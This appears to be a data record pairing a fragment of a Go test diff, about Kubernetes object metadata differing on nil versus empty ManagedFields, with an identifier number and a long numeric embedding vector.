identical fields OwnerReferences: {{APIVersion: "Xȩ", Kind: `\FZ`, Name: "ʮʩȼŚ尺籴ŪZɨ蓻", UID: "}mǠʉjƱ/`Ï8Èŝ0", ...}}, Finalizers: {"ǒ賾赣"}, - ManagedFields: []v1.ManagedFieldsEntry{}, + ManagedFields: nil, … ``` --- end body ---
4,897
[ -0.016432376578450203, -0.017089100554585457, -0.012213638052344322, -0.01401962898671627, 0.014276607893407345, -0.004397195298224688, -0.005021797027438879, 0.027254045009613037, -0.016689354553818703, -0.04157348349690437, -0.016146844252943993, 0.044057611376047134, -0.03843262791633606, 0.018117016181349754, -0.0003549075627233833, 0.059219371527433395, 0.0005081580020487309, 0.004432886838912964, -0.01973027177155018, -0.006856340914964676, -0.015632886439561844, -0.018745185807347298, -0.027396811172366142, 0.08480305224657059, -0.0012572337873280048, -0.014262331649661064, -0.01947329379618168, -0.0021200762130320072, -0.04845480993390083, -0.00843033753335476, -0.01441937405616045, 0.028082087635993958, 0.014183809980750084, 0.02743964083492756, 0.06618635356426239, 0.013227277435362339, 0.032036710530519485, 0.02364206314086914, 0.016403822228312492, -0.017417462542653084, -0.052052512764930725, -0.06241733208298683, 0.004375780466943979, 0.04968259483575821, -0.001436583697795868, 0.017717270180583, 0.009058508090674877, 0.01182103157043457, -0.03080892004072666, -0.02842472679913044, -0.02679719403386116, -0.043486546725034714, 0.004950413946062326, -0.04391484707593918, 0.01341287326067686, -0.016175396740436554, 0.061674948781728745, -0.008908603340387344, -0.017374632880091667, -0.010429061949253082, 0.010157806798815727, 0.022128742188215256, -0.020115740597248077, 0.025612235069274902, 0.055393241345882416, 0.026725810021162033, -0.025098277255892754, 0.017003441229462624, -0.03563441336154938, -0.013020266778767109, -0.007523772306740284, -0.026982789859175682, -0.0036316122859716415, 0.028153471648693085, 0.059162262827157974, -0.007816443219780922, 0.027582406997680664, 0.013726959004998207, -0.041916120797395706, -0.03135143220424652, -0.008180496282875538, 0.015418737195432186, -0.03948909789323807, -0.01924486830830574, 0.003560229204595089, 0.00011003026884282008, -0.03434951975941658, -0.07235384732484818, 0.012927468866109848, -0.0016302102012559772, -0.03137998655438423, 0.020701082423329353, -0.024869851768016815, -0.02329942397773266, -0.0016587633872404695, -0.016689354553818703, -0.033121731132268906, 0.030294962227344513, -0.06275997310876846, 0.02364206314086914, -0.04171624779701233, -0.026583043858408928, -0.0016007646918296814, 0.009194135665893555, 0.02868170663714409, 0.00734531506896019, 0.0017640533624216914, 0.04534250870347023, 0.02798215113580227, 0.10564690083265305, 0.025755001232028008, -0.018045632168650627, -0.03769024461507797, -0.04120229184627533, -0.03343581780791283, 0.003121223533526063, 0.018588144332170486, 0.0003305927093606442, -0.028653152287006378, -0.023270871490240097, -0.020601145923137665, 0.01918776147067547, -0.019287697970867157, -0.010764562524855137, -0.0285817701369524, 0.020658252760767937, 0.041345056146383286, -0.0014312299899756908, -0.018345441669225693, -0.018887951970100403, 0.003233651863411069, -0.013377182185649872, -0.008351815864443779, -0.02565506473183632, 0.012627660296857357, -0.021657614037394524, -0.021814657375216484, 0.011150031350553036, 0.009029954671859741, -0.007209687028080225, -0.03649101033806801, -0.03706207498908043, 0.07503785192966461, -0.0037154871970415115, -0.01981593295931816, -0.027382533997297287, -0.011150031350553036, -0.0015427659964188933, 0.003344295546412468, 0.01621822640299797, -0.042144548147916794, -0.040202926844358444, 0.015333076938986778, 0.010393370874226093, 0.02102944441139698, -0.032550666481256485, 0.007173995487391949, 0.012320713140070438, 0.013584192842245102, -0.019030718132853508, -0.017931420356035233, -0.010543274693191051, -0.007263224571943283, -0.007830719463527203, -0.004597067832946777, 0.02294250950217247, 0.024384446442127228, 0.006538686342537403, 0.0025358826387673616, 0.0044899932108819485, 0.011292797513306141, 0.001895219786092639, -0.0030766089912503958, 0.015718545764684677, -0.023427914828062057, 0.018331164494156837, 0.007381006609648466, 0.053166087716817856, 0.05165276676416397, 0.002346717519685626, 0.000502358132507652, 0.013705544173717499, 0.016389546915888786, 0.009486806578934193, 0.023270871490240097, -0.029838111251592636, 0.004511408042162657, 0.02549802139401436, -0.022799743339419365, -0.0043579344637691975, 0.0040438491851091385, -0.012227915227413177, 0.025355255231261253, -0.009236965328454971, -0.02832479029893875, -0.0026590183842927217, -0.01164971198886633, 0.0036244739312678576, 0.004133078269660473, -0.026854300871491432, 0.016004078090190887, -0.037204839289188385, -0.02852466329932213, -0.029866663739085197, -0.0023128106258809566, 0.0002870936586987227, -0.02100089006125927, 0.03826130926609039, 0.02035844326019287, -0.02861032262444496, -0.05487928166985512, -0.00935117807239294, -0.0010662841377779841, 0.02297106198966503, 0.02317093499004841, 0.017988527193665504, 0.015290247276425362, 0.04634186998009682, -0.00487546157091856, -0.016803568229079247, 0.00276073906570673, -0.015361630357801914, 0.02940981276333332, -0.003360356669872999, -0.04648463800549507, -0.0008989801863208413, 0.016546588391065598, -0.038603950291872025, -0.024255957454442978, -0.001391077064909041, 0.01978737860918045, -0.01953040063381195, 0.008209049701690674, 0.01714620552957058, -0.014933331869542599, -0.006924155168235302, -0.023599233478307724, -0.006535117514431477, -0.006274569313973188, -0.01924486830830574, 0.018473930656909943, 0.019573230296373367, -0.03563441336154938, -0.04976825788617134, -0.008601656183600426, 0.00008420967787969857, 0.0017818991327658296, 0.01883084699511528, 0.0030248563271015882, 0.01688922755420208, -0.04074544087052345, -0.008894327096641064, 0.0029623962473124266, -0.010479030199348927, 0.032550666481256485, -0.0006232631858438253, 0.019715996459126472, 0.02542663924396038, 0.01921631395816803, -0.006160356570035219, 0.03783301264047623, 0.034977689385414124, -0.038575395941734314, 0.004122370388358831, 0.002978457370772958, -0.0045435307547450066, -0.039717525243759155, 0.021486295387148857, -0.003769024508073926, -0.0073881447315216064, 0.005585723090916872, -0.03306462615728378, -0.02154340222477913, -0.02361351065337658, 0.014440788887441158, -0.009115613996982574, 0.002221797127276659, -0.02097233757376671, 0.008694454096257687, 0.014148118905723095, 0.010957296937704086, -0.009836583398282528, -0.03537743538618088, 0.016846397891640663, -0.03480637073516846, 0.01309878844767809, 0.044685784727334976, -0.04756965860724449, -0.008337539620697498, 0.005881962366402149, -0.02402753196656704, -0.0161611195653677, 0.00009502867033006623, 0.008822944015264511, 0.026183299720287323, -0.006881325040012598, 0.002805353607982397, 0.031437091529369354, -0.005703505128622055, 0.014947609044611454, -0.02335653081536293, 0.015789927914738655, 0.0019184192642569542, -0.017831483855843544, 0.007495219353586435, 0.010764562524855137, -0.023570680990815163, 0.028510386124253273, -0.013698405586183071, 0.021686168387532234, -0.007416698150336742, -0.05105315148830414, 0.0033210960682481527, -0.02332797832787037, 0.014904779382050037, 0.0009244103566743433, 0.05759183689951897, -0.02762523666024208, -0.04391484707593918, -0.0259977038949728, 0.0006103250198066235, -0.009122752584517002, -0.038832373917102814, 0.021786104887723923, 0.009058508090674877, -0.0483691468834877, -0.004993243608623743, 0.020558316260576248, -0.06213179975748062, 0.01740318536758423, 0.0062852767296135426, 0.009808029979467392, -0.021015167236328125, -0.02221440151333809, 0.004129508975893259, -0.04891166090965271, -0.058362774550914764, -0.0038225618191063404, 0.045770805329084396, 0.019487570971250534, -0.024812744930386543, -0.0015043976018205285, 0.013762650080025196, -0.010864499025046825, 0.04688438028097153, 0.000032791584089864045, 0.007438112981617451, 0.01180675532668829, 0.010957296937704086, 0.005739196669310331, 0.0009850859642028809, 0.04003160819411278, 0.0038332692347466946, 0.03023785538971424, 0.04454301670193672, 0.008758699521422386, -0.010871636681258678, 0.011906690895557404, 0.05876252055168152, -0.0002960165438707918, 0.03026640973985195, -0.04251573979854584, -0.019801655784249306, 0.019744548946619034, 0.0019576798658818007, -0.000049466216296423227, 0.02138635888695717, -0.005296621471643448, -0.017988527193665504, 0.007880687713623047, -0.044628676027059555, 0.05356583371758461, 0.004639897495508194, 0.038603950291872025, -0.02529815025627613, -0.021200763061642647, 0.010257743299007416, -0.0088586350902915, -0.032864753156900406, 0.020529761910438538, -0.0036316122859716415, -0.013312936760485172, 0.02457004226744175, -0.021100826561450958, 0.0006415550597012043, 0.08817233145236969, 0.018017079681158066, 0.028853025287389755, -0.001224219100549817, -0.017717270180583, 0.011378456838428974, 0.023499296978116035, -0.03329304978251457, 0.01727469637989998, -0.03743326663970947, 0.027196938171982765, -0.005435818340629339, -0.047055698931217194, 0.0014838749775663018, 0.0012117271544411778, 0.022128742188215256, 0.02938126027584076, -0.01905927248299122, 0.017917143180966377, -0.021871764212846756, 0.050110895186662674, -0.030409175902605057, -0.01470490638166666, 0.012085149064660072, 0.00775219826027751, 0.007616570685058832, 0.017902866005897522, -0.0006054174154996872, -0.004957552067935467, 0.04360076040029526, 0.028210578486323357, -0.01035767886787653, -0.010329126380383968, -0.04194467514753342, -0.0032871889416128397, -0.01263479795306921, 0.00787354912608862, 0.023970425128936768, 0.014105289243161678, 0.001819375203922391, 0.01401962898671627, 0.018916506320238113, 0.019858762621879578, 0.01637526974081993, -0.017260419204831123, -0.028124917298555374, 0.005614276044070721, 0.02297106198966503, 0.01981593295931816, -0.01324155367910862, -0.02746819332242012, 0.004729126580059528, -0.01624678075313568, 0.008880049921572208, 0.0037297639064490795, -0.018059909343719482, 0.039717525243759155, 0.003347864607349038, 0.00995793379843235, -0.029081450775265694, -0.01631816290318966, -0.06789954751729965, 0.019858762621879578, -0.015632886439561844, -0.012641936540603638, -0.016675079241394997, 0.05279489606618881, -0.05733485892415047, 0.018659526482224464, -0.015076098032295704, -0.029552578926086426, 0.013063096441328526, -0.03591994568705559, 0.05136723443865776, -0.006784957833588123, 0.031208666041493416, -0.006085404194891453, 0.011271381750702858, -0.002319948747754097, 0.0028678136877715588, 0.009672402404248714, 0.03600560501217842, -0.06024728715419769, 0.002778584836050868, -0.0037404713220894337, 0.004086679313331842, 0.005071765277534723, -0.0026126191951334476, 0.04471433535218239, 0.001315232482738793, 0.03686220198869705, -0.004864754155278206, -0.04634186998009682, -0.001387507887557149, -0.01694633439183235, -0.011142892763018608, 0.00715258065611124, 0.0047255572862923145, 0.0351775623857975, -0.01893078163266182, -0.0181027390062809, -0.000636647513601929, -0.016746461391448975, -0.05156710743904114, 0.018174123018980026, 0.016432376578450203, -0.006445888429880142, -0.017545951530337334, -0.018402548506855965, 0.018973613157868385, 0.01828833483159542, 0.023813381791114807, -0.047398339956998825, 0.04031714051961899, -0.07469521462917328, -0.009422561153769493, -0.0250840000808239, 0.036433905363082886, 0.009650987572968006, -0.03814709559082985, -0.03783301264047623, 0.005489355884492397, 0.05899094417691231, -0.008144805207848549, -0.024113191291689873, -0.04211599379777908, -0.007338176481425762, 0.02516965940594673, 0.006617208011448383, 0.011064371094107628, 0.009186997078359127, 0.002321733394637704, 0.005478648468852043, 0.030352069064974785, 0.023256594315171242, -0.009886550717055798, -0.027996428310871124, 0.042173098772764206, 0.024527212604880333, -0.01002217922359705, -0.007202548906207085, 0.031465645879507065, 0.009443975985050201, 0.01499043870717287, -0.028124917298555374, 0.009993625804781914, -0.02221440151333809, -0.010714594274759293, 0.02214301936328411, -0.01921631395816803, -0.01994442194700241, 0.011635435745120049, 0.01653231307864189, -0.01730324886739254, 0.003876099130138755, 0.015161758288741112, 0.006295984145253897, -0.04274416342377663, -0.007923517376184464, -0.007238240446895361, 0.03743326663970947, -0.01813129149377346, 0.031979601830244064, -0.006827787961810827, -0.016261056065559387, 0.004336519632488489, -0.005796303041279316, 0.01740318536758423, 0.036405351012945175, -0.009251242503523827, -0.02138635888695717, 0.028224853798747063, -0.010493307374417782, 0.004208030179142952, -0.0248270221054554, -0.02227150835096836, 0.006238877773284912, 0.0004345442575868219, -0.019616059958934784, -0.015704268589615822, -0.012856085784733295, -0.005739196669310331, 0.02447010576725006, -0.011199998669326305, -0.024227404966950417, 0.012049457058310509, -0.01883084699511528, 0.010222051292657852, -0.0398317351937294, -0.012484894134104252, 0.01831688918173313, 0.0005688336095772684, -0.026311788707971573, -0.023156657814979553, -0.01637526974081993, 0.04579935967922211, -0.017902866005897522, -0.0026376033201813698, 0.004978966899216175, 0.006228170357644558, -0.012727595865726471, 0.007530910894274712, -0.012770426459610462, -0.004832631908357143, -0.003226513508707285, 0.00952963624149561, 0.0015971955144777894, -0.017103375867009163, 0.008437475189566612, 0.037261947989463806, 0.00013797004066873342, -0.01381261833012104, -0.013669852167367935, 0.047912295907735825, -0.010571828112006187, 0.004315104801207781, 0.020372720435261726, -0.0009145952062681317, -0.03820420429110527, 0.0022985339164733887, 0.029024343937635422, 0.005774888209998608, 0.031979601830244064, -0.007127596531063318, 0.013912554830312729, -0.00101542379707098, 0.029609685763716698, 0.035434540361166, -0.017003441229462624, 0.008801529183983803, 0.003344295546412468, 0.051766980439424515, -0.0030391330365091562, 0.01694633439183235, 0.00312657724134624, 0.017860036343336105, -0.01621822640299797, 0.0043579344637691975, -0.004582791123539209, -0.015732822939753532, 0.02998087741434574, 0.018488207831978798, 0.01032198779284954, -0.005328744184225798, 0.0012652643490582705, -0.0008539195987395942, -0.006874186918139458, 0.002896366873756051, -0.034463733434677124, -0.04262995347380638, 0.015875589102506638, 0.04157348349690437, -0.0034067556262016296, -0.03454939275979996, -0.03783301264047623, -0.009836583398282528, -0.002337794518098235, 0.007802166510373354, 0.01660369522869587, -0.04143071547150612, -0.02048693224787712, -0.018117016181349754, 0.03817564994096756, 0.007566602434962988, 0.04725557193160057, -0.007944932207465172, 0.01644665189087391, -0.017488844692707062, 0.043258123099803925, 0.013705544173717499, 0.016261056065559387, 0.0076094320975244045, 0.029895218089222908, 0.004343658220022917, -0.01730324886739254, -0.02731115184724331, -0.004632759373635054, 0.0012474186951294541, -0.0222429558634758, 0.02938126027584076, -0.002587635302916169, -0.038289863616228104, -0.008815805427730083, -0.005956914741545916, 0.05222383141517639, -0.015004714950919151, -0.0041616312228143215, 0.007095474284142256, -0.020058633759617805, -0.005953345447778702, 0.002787507837638259, 0.003033779328688979, 0.013420011848211288, -0.014283746480941772, 0.002319948747754097, -0.007323899772018194, -0.009037093259394169, -0.018716633319854736, 0.029238494113087654, -0.027710895985364914, 0.010443339124321938, -0.012870362028479576, 0.00150172074791044, 0.005417972803115845, -0.009137028828263283, -0.018216952681541443, 0.009929381310939789, 0.008494582027196884, -0.003230082569643855, 0.01509037520736456, 0.011085785925388336, -0.008166220039129257, 0.0033871252089738846, -0.005150286480784416, -0.008073422126471996, 0.012898915447294712, 0.0017729762475937605, 0.007223963737487793, 0.017959972843527794, -0.0009244103566743433, 0.004033141769468784, 0.0007334607653319836, -0.0010073931189253926, 0.01284180860966444, -0.006042574532330036, -0.013826894573867321, -0.013027405366301537, 0.01704627089202404, 0.022856850177049637, 0.011685403995215893, 0.015347354114055634, -0.006221032235771418, -0.0037047797814011574, -0.04559948667883873, 0.012342127971351147, -0.004297259263694286, 0.00865162443369627, 0.0022913955617696047, -0.034977689385414124, -0.021743273362517357, 0.0018559590680524707, 0.03272198513150215, 0.009515359066426754, -0.021971700713038445, 0.010079285129904747, 0.004236583597958088, -0.03303607180714607, 0.014904779382050037, 0.018017079681158066, -0.003094454761594534, 0.03275053948163986, -0.014148118905723095, -0.01918776147067547, 0.030380621552467346, -0.011542637832462788, 0.027967875823378563, -0.014319437555968761, 0.0017934988718479872, -0.008751560933887959, 0.00532160559669137, -0.024355893954634666, 0.012063734233379364, 0.010264880955219269, -0.0004008603864349425, -0.018630973994731903, -0.004379349760711193, 0.006445888429880142, -0.0051574246026575565, -0.023941872641444206, -0.017288971692323685, 0.01624678075313568, 0.015704268589615822, 0.021814657375216484, -0.0021432756911963224, 0.022599870339035988, -0.03486347571015358, 0.008758699521422386, -0.0019148500869050622, 0.0004129062872380018, 0.04017437621951103, -0.0032514974009245634, -0.0047112805768847466, -0.02731115184724331, 0.000778075132984668, -0.0015748883597552776, -0.0020362013019621372, 0.0062460158951580524, -0.052880555391311646, 0.009615295566618443, 0.003446016227826476, 0.013255830854177475, -0.02275691367685795, -0.008373230695724487, 0.01002217922359705, 0.006902739871293306, -0.011435562744736671, -0.037261947989463806, -0.011078648269176483, 0.021843209862709045, 0.01851676031947136, -0.009165582247078419, 0.017760099843144417, -0.013491394929587841, 0.003454939229413867, 0.021486295387148857, -0.039431992918252945, -0.013377182185649872, 0.032522112131118774, -0.0045042699202895164, 0.041916120797395706, -0.0403456948697567, -0.009536773897707462, 0.00925838015973568, -0.008908603340387344, 0.0014223071048036218, -0.006870617624372244, 0.010043594054877758, -0.004204460885375738, -0.01042192429304123, -0.009551051072776318, -0.009900827892124653, -0.0031408537179231644, -0.017217589542269707, -0.02462714910507202, 0.036148373037576675, 0.002203951356932521, 0.015033268369734287, -0.02211446687579155, 0.004079540725797415, 0.01624678075313568, -0.010985850356519222, 0.020858123898506165, 0.006549394223839045, -0.004968259483575821, 0.021272147074341774, -0.037547480314970016, 0.007134735118597746, -0.007480942644178867, 0.02022995427250862, 0.01189955323934555, -0.01644665189087391, 0.012806117534637451, -0.04302969574928284, 0.022599870339035988, 0.0049753980711102486, -0.02084384858608246, 0.0192734207957983, -0.008408921770751476, -0.00042562137241475284, -0.024912681430578232, 0.00017533460049889982, 0.005036073736846447, 0.006449457723647356, -0.010007902048528194, 0.01510465145111084, 0.015761375427246094, -0.018887951970100403, 0.0041473545134067535, -0.0015365199651569128, -0.002241427544504404, -0.004807647783309221, -0.029609685763716698, 0.0285817701369524, 0.0002855321508832276, 0.0041616312228143215, 0.015618609264492989, -0.0010279157431796193, 0.00922268908470869, 0.003103377763181925, -0.003429955104365945, -0.032522112131118774, 0.013876862823963165, 0.03460649773478508, -0.01567571610212326, 0.02861032262444496, -0.011706818826496601, -0.014433651231229305, 0.03349292278289795, -0.022885402664542198, 0.018274057656526566, -0.00042138301068916917, -0.01359133142977953, -0.022599870339035988, -0.027796555310487747, 0.010593242943286896, 0.019287697970867157, -0.01583275757730007, 0.009872274473309517, -0.01940190978348255, -0.0034210323356091976, 0.007430974394083023, -0.0065850852988660336, 0.008394645527005196, -0.027382533997297287, -0.009786615148186684, -0.012156532146036625, -0.0025412363465875387, -0.025512298569083214, 0.008451752364635468, 0.001996940467506647, -0.03243645280599594, 0.0014231994282454252, 0.009344040416181087, -0.021115103736519814, -0.016075460240244865, -0.0222429558634758, -0.008023453876376152, -0.04331522807478905, -0.02619757689535618, 0.010992988012731075, 0.02408463880419731, 0.0030302100349217653, -0.020272783935070038, -0.029609685763716698, -0.025769278407096863, -0.011599743738770485, -0.018245505169034004, 0.010550413280725479, -0.01787431351840496, 0.023727722465991974, -0.02568361721932888, -0.008308986201882362, 0.01947329379618168, 0.013312936760485172, -0.011942382901906967, 0.005011089611798525, -0.02689713053405285, -0.002853536978363991, -0.019459016621112823, -0.0023949011228978634, -0.002116507152095437, -0.021457742899656296, -0.01663224771618843, 0.004407902713865042, 0.03217947483062744, -0.03152275085449219, 0.01660369522869587, 0.01823122799396515, 0.003222944214940071, -0.0015213510487228632, -0.0019541108049452305, 0.016203951090574265, 0.0018184829968959093, -0.009900827892124653, 0.0031569150742143393, 0.008380369283258915, -0.012227915227413177, 0.004233014304190874, -0.013769788667559624, -0.012020903639495373, 0.00755946384742856, 0.018559589982032776, 0.027125556021928787, -0.010586105287075043, -0.03709062933921814, -0.02242855168879032, -0.004418610129505396, 0.017346078529953957, -0.036662328988313675, 0.018488207831978798, 0.04282982274889946, 0.030352069064974785, -0.018588144332170486, 0.0011394517496228218, -0.04365786910057068, -0.019873037934303284, -0.001668578595854342, 0.010543274693191051, -0.005043211858719587, 0.005118164233863354, 0.0023913318291306496, -0.023570680990815163, -0.00973664689809084, -0.025026893243193626, -0.02058686874806881, -0.011842446401715279, 0.021928871050477028, 0.006056851241737604, 0.0009949011728167534, 0.032293688505887985, 0.009779476560652256, -0.04091675952076912, -0.014069597236812115, 0.015233141370117664, -0.013477117754518986, 0.002766092773526907, 0.0012688335264101624, -0.010236328467726707, -0.007041937205940485, 0.0027393242344260216, -0.0031551304273307323, 0.008016315288841724, -0.02170044369995594, 0.0009261949453502893, -0.017474567517638206, -0.028367619961500168, -0.024512935429811478, -0.011357042007148266, -0.001062715076841414, -0.020272783935070038, 0.012606245465576649, -0.006752835586667061, 0.006039005238562822, -0.04065978154540062, 0.01210656389594078, 0.03374990075826645, -0.0218574870377779, 0.023813381791114807, -0.02361351065337658, -0.023699169978499413, -0.017959972843527794, -0.007573740556836128, 0.001893435139209032, -0.03352147713303566, -0.013762650080025196, -0.05433677136898041, 0.0266401506960392, 0.0003919375012628734, -0.00010512267908779904, 0.02304244600236416, 0.014140980318188667, 0.02868170663714409, -0.01381261833012104, -0.027967875823378563, -0.02087240107357502, 0.017288971692323685, 0.001672147773206234, 0.013876862823963165, -0.032236579805612564, 0.009765200316905975, 0.012449202127754688, -0.005742765497416258, -0.0030498404521495104, 0.000012554771274153609, 0.02873881161212921, -0.04282982274889946, 0.0019880176987499, -0.010015040636062622, 0.015818482264876366, 0.004757679533213377, 0.030609047040343285, -0.028538940474390984, 0.007248947862535715, 0.01510465145111084, 0.007695091888308525, -0.0218574870377779, -0.0009105799254029989, 0.015875589102506638, -0.023670615628361702, -0.00422944501042366, -0.021457742899656296, 0.023813381791114807, -0.019387634471058846, -0.03160841017961502, 0.030894579365849495, 0.014455066062510014, -0.0005683874478563666, -0.015076098032295704, -0.005296621471643448, -0.006042574532330036, -0.034178201109170914, -0.018688080832362175, 0.0075951553881168365, 0.0059319306164979935, -0.020886678248643875, 0.005692797712981701, 0.012641936540603638, 0.03126577287912369, -0.03306462615728378, 0.0052002547308802605, 0.0015383044956251979, -0.025026893243193626, -0.02966679260134697, 0.030409175902605057, 0.008987125009298325, -0.0079520707949996, -0.00783785805106163, 0.004390057176351547, -0.023884765803813934, -0.030866026878356934, -0.010236328467726707, -0.02208591252565384, -0.00017600381397642195, 0.02154340222477913, 0.007894963957369328, -0.004807647783309221, -0.002125430153682828, 0.01274901069700718, -0.04431459307670593, 0.017988527193665504, -0.016518035903573036, 0.018274057656526566, -0.00901567842811346, -0.00512173306196928, 0.002253919607028365, -0.0015659654745832086, 0.012477755546569824, -0.008644485846161842, -0.003106946824118495, -0.021557677537202835, 0.0036476734094321728, -0.005260929930955172, -0.018602419644594193, -0.008216188289225101, -0.012270744889974594, -0.016803568229079247, -0.03603415936231613, -0.0033978328574448824, -0.019301975145936012, -0.02239999733865261, -0.005050349980592728, 0.017660165205597878, 0.09628144651651382, -0.007198979612439871, -0.006185340695083141, -0.006121095735579729, -0.017788654193282127, -0.007238240446895361, 0.012991713359951973, 0.019073547795414925, 0.012513446621596813, -0.002253919607028365, 0.032836198806762695, -0.006231739651411772, -0.025126829743385315, -0.009536773897707462, 0.008116251789033413, 0.009579604491591454, -0.008066283538937569, 0.006995537783950567, 0.009822306223213673, 0.005335882306098938, -0.014169533737003803, 0.012877500616014004, -0.010900190100073814, 0.013569915667176247, -0.01174250990152359, 0.006895601749420166, 0.00706692086532712, 0.013676990754902363, -0.010250604711472988, -0.014298022724688053, -0.00689917104318738, -0.006552963051944971, -0.007523772306740284, -0.009608156979084015, -0.012092286720871925, 0.021300699561834335, 0.012363542802631855, -0.012135117314755917, 0.002767877420410514, -0.011542637832462788, -0.0020950923208147287, -0.0070597827434539795, 0.001615933608263731, 0.01539018377661705, 0.00620675552636385, 0.006952708121389151, 0.013762650080025196, 0.001599872368387878, -0.0021736135240644217, -0.00418304605409503, 0.007737921550869942, -0.01768871769309044, -0.011035817675292492, 0.0036548117641359568, -0.02131497673690319, 0.008094836957752705, -0.01893078163266182, 0.0027500316500663757, -0.0101506682112813, -0.008687316440045834, -0.009115613996982574, 0.0028089226689189672, -0.014148118905723095, 0.033692795783281326, -0.009236965328454971, -0.007802166510373354, -0.019587505608797073, -0.0030659015756100416, -0.007452389691025019, 0.02848183363676071, 0.014205224812030792, 0.006984830368310213, 0.010843084193766117, 0.002544805407524109, 0.01857386715710163, 0.005246653687208891, -0.009786615148186684, -0.0036797956563532352, -0.006178202107548714, -0.023056721314787865, 0.00876583717763424, 0.008137666620314121, -0.03377845510840416, 0.01883084699511528, -0.024869851768016815, 0.011721095070242882, -0.020258506760001183, -0.02749674767255783, 0.0312943235039711, 0.0037047797814011574, 0.011128616519272327, 0.024298787117004395, 0.014233778230845928, 0.011942382901906967, -0.004040279891341925, 0.019416186958551407, -0.016018355265259743, -0.0038546842988580465, -0.008772975765168667, -0.022071635350584984, -0.01815984584391117, -0.009094199165701866, 0.022228678688406944, 0.01838827133178711, -0.03323594480752945, 0.014112426899373531, 0.0004017526807729155, 0.025355255231261253, -0.020572591572999954, 0.026682980358600616, -0.038603950291872025, -0.009115613996982574, 0.0032782661728560925, -0.006295984145253897, 0.0034692157059907913, -0.0005090503254905343, 0.012977437116205692, -0.0007910132990218699, 0.024141743779182434, -0.00023779475304763764, -0.02182893455028534, -0.004943275358527899, -0.00825187936425209, -0.006178202107548714, 0.036947861313819885, 0.0108002545312047, -0.012249330058693886, 0.009172720834612846, 0.023285148665308952, 0.006381643936038017, 0.024969788268208504, 0.03426386043429375, 0.004136647097766399, -0.012127978727221489, 0.026583043858408928, 0.020529761910438538, -0.0017934988718479872, 0.015789927914738655, 0.01214225497096777, 0.011692541651427746, -0.008915741927921772, 0.035520199686288834, 0.014362268149852753, -0.007430974394083023, 0.018402548506855965, -0.021472018212080002, -0.014426512643694878, 0.025326702743768692, 0.012085149064660072, 0.01885939948260784, -0.014219501987099648, -0.008994263596832752, -0.003119438886642456, -0.004654174204915762, 0.018088461831212044, -0.021914593875408173, 0.028724536299705505, 0.010429061949253082, 0.024612871930003166, 0.005764180328696966, 0.023684892803430557, -0.0010511152213439345, 0.02791076898574829, 0.0011198214488103986, -0.0027321858797222376, 0.013805479742586613, -0.009315486997365952, -0.028881577774882317, -0.029752451926469803, 0.0222429558634758, 0.021215040236711502, 0.005003951024264097, -0.04856901988387108, 0.005935499910265207, -0.002330656396225095, 0.003961758688092232, -0.010186360217630863, 0.010007902048528194, 0.024641426280140877, 0.009715232066810131, -0.003758317092433572, 0.010136391967535019, -0.00857310276478529, 0.00471484987065196, 0.009386870078742504, 0.015689993277192116, 0.0064958566799759865, 0.014919055625796318, -0.019873037934303284, 0.020101463422179222, -0.01104295626282692, 0.0318082831799984, -0.022771190851926804, -0.010193497873842716, 0.0006509241065941751, 0.02762523666024208, 0.006763543002307415, -0.01064321119338274, 0.001559719443321228, 0.006781389005482197, 0.016203951090574265, -0.031123006716370583, 0.003108731471002102, -0.011014402844011784, 0.01606118492782116, -0.03372135013341904, -0.017674440518021584, -0.0014258762821555138, 0.01650375872850418, -0.00042428294545970857, 0.014804842881858349, -0.008723007515072823, 0.004522115457803011, -0.011164307594299316, 0.027068449184298515, 0.013262969441711903, -0.018902229145169258, -0.03072326071560383, -0.0070597827434539795, 0.007766474969685078, 0.018188398331403732, 0.007666538469493389, 0.00825187936425209, 0.008623071014881134, 0.004900445695966482, -0.02428450994193554, 0.012677627615630627, -0.033635687083005905, 0.034178201109170914, -0.0004461439966689795, 0.0036244739312678576, -0.0060140211135149, 0.0018738048383966088, 0.0042794132605195045, -0.0024912680964916945, -0.030951686203479767, 0.020158570259809494, 0.0008311662822961807, 0.00975092314183712, 0.003217590507119894, 0.013555639423429966, -0.025055447593331337, -0.006517271511256695, -0.002892797812819481, -0.007248947862535715, -0.00012848946789745241, -0.0038154234644025564, -0.01753167435526848, -0.025669341906905174, 0.008701592683792114, -0.00694556999951601, -0.005268068518489599, -0.008216188289225101, -0.003121223533526063, -0.012556277215480804, -0.0111214779317379, 0.009122752584517002, -0.007616570685058832, -0.005682089831680059, -0.013655575923621655, 0.029324153438210487, -0.012741873040795326, -0.00852313544601202, 0.0038725300692021847, -0.02915283478796482, 0.011635435745120049, -0.030095089226961136, -0.017802929505705833, 0.008294709026813507, -0.00406169518828392, 0.0022949648555368185, -0.007006245665252209, 0.019173484295606613, 0.001879158546216786, -0.009900827892124653, 0.018531037494540215, -0.006103250198066235, -0.00897284783422947, -0.016046907752752304, -0.005996175576001406, 0.0033799870871007442, 0.013120203278958797, -0.01666080206632614, -0.039945948868989944, 0.015176034532487392, -0.031151559203863144, -0.05139578878879547, -0.0005425111157819629, 0.021272147074341774, 0.0013080942444503307, -0.026968512684106827, 0.002673294860869646, -0.004233014304190874, 0.003026640973985195, 0.008151942864060402, 0.023813381791114807, 0.03332160413265228, 0.01844537816941738, -0.016974886879324913, 0.008587379939854145, -0.013370043598115444, 0.00012536646681837738, 0.01540446002036333, 0.010950158350169659, -0.012934607453644276, 0.005410834681242704, -0.02791076898574829, -0.002866029040887952, -0.017760099843144417, -0.012691904790699482, 0.011985212564468384, -0.00995793379843235, -0.014119565486907959, 0.003943913150578737, -0.01867380365729332, 0.01898788847029209, 0.04993957653641701, -0.001986233051866293, 0.006827787961810827, 0.009244103915989399, 0.009286933578550816, -0.014540725387632847, 0.025455191731452942, 0.023342253640294075, -0.004304397385567427, 0.009451114572584629, -0.013477117754518986, -0.005642829462885857, 0.003790439572185278, -0.003131930949166417, -0.01880229264497757, 0.015176034532487392, 0.002452007494866848, -0.008501720614731312, -0.036947861313819885, -0.017117653042078018, -0.007816443219780922, 0.013155894353985786, -0.023956147953867912, -0.0226284246891737, -0.020958060398697853, 0.02182893455028534, 0.011978073976933956, -0.00755946384742856, -0.011035817675292492, -0.013084511272609234, 0.02940981276333332, 0.0035959207452833652, 0.001619502785615623, -0.012577692046761513, -0.026326065883040428, 0.021928871050477028, 0.02861032262444496, -0.006199616938829422, -0.009251242503523827, -0.007016953080892563, 0.0033906945027410984, 0.006278138607740402, -0.009158444590866566, 0.008373230695724487, -0.027097001671791077, -0.0061532179825007915, -0.004886168986558914, -0.0013634160859510303, -0.007077628280967474, -0.02112938091158867, 0.023270871490240097, 0.003355002962052822, 